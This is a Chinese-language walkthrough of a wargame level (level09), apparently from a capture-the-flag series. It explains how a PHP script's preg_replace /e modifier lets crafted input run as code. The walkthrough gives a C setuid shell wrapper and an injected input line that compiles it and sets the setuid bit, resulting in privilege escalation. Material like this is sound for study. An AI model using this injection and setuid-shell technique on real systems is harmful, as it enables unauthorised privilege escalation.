題目給出一段PHP代碼:
<?php
function spam($email)
{
$email = preg_replace("/\./", " dot ", $email);
$email = preg_replace("/@/", " AT ", $email);
return $email;
}
function markup($filename, $use_me)
{
$contents = file_get_contents($filename);
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
$contents = preg_replace("/\[/", "<", $contents);
$contents = preg_replace("/\]/", ">", $contents);
return $contents;
}
$output = markup($argv[1], $argv[2]);
print $output;
?>
若輸入參數符合[email (.*)]正則形式,則將@替換爲 AT,將. 替換爲dot。
漏洞是因爲該正則表達式設置了/e選項,設置該選項後php會將正則替換後的結果作爲代碼執行。
依然在/home/level09目錄下創建如下代碼:
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/bin/bash");
}
然後創建輸入文件in.txt,內容如下:
[email "{${`gcc -o /home/flag09/level09 /home/level09/level09.c;chmod +s /home/flag09/level09`}}"]
運行程序:
/home/flag09/flag09 /home/level09/in.txt
將在/home/flag09目錄下生成level09 可執行文件,運行即可。